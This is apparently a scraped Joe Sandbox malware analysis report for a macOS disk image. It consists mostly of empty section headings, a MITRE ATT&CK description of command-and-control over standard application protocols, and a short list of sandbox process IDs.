Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report G0Sr0fA5cv.dmg

Overview

General Information

Detection

Classification Spiderchart

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

Cryptography:

Networking:

System Summary:

Persistence and Installation Behavior:

Malware Analysis System Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Malware Configuration

Runtime Messages

Behavior Graph

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Sigma Overview

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: Terminal PID: 18821 Parent PID: 321

General

Analysis Process: login PID: 18821 Parent PID: 321

General

Analysis Process: login PID: 18822 Parent PID: 18821

General

Analysis Process: bash PID: 18822 Parent PID: 18821

General

Analysis Process: bash PID: 18823 Parent PID: 18822

General

Analysis Process: bash PID: 18824 Parent PID: 18823

General

Analysis Process: path_helper PID: 18824 Parent PID: 18823

General

Analysis Process: bash PID: 18825 Parent PID: 18822

General

Analysis Process: mkdir PID: 18825 Parent PID: 18822

General